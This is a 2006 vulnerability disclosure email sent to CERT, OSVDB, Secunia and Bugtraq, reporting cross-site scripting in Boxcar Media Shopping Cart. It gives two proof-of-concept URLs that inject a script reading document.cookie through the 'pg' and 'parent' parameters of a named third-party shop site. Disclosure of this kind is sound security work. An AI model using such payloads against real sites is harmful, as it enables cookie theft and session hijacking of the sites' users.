From: preddy . <lil.turk@email.com>
To: cert@cert.org, Vuln@frsirt.com, moderators@osvdb.org, vuln@secunia.com, bugtraq@securityfocus.com
Date: Thu, 05 Jan 2006 18:29:41 -0500
Subject: [OSVDB Mods] Boxcar Media Shopping Cart - Cross Site Scripting

Boxcar Media Shopping Cart - Cross Site Scripting

Vendor URL: http://www.boxcarmedia.com/

PoC:

http://www.dannyoart.com/shop/index.php?p=catalog&parent=1&pg="><script>alert(document.cookie)</script>

http://www.dannyoart.com/shop/index.php?p=catalog&parent="><script>alert(document.cookie)</script>&pg=1


Preddy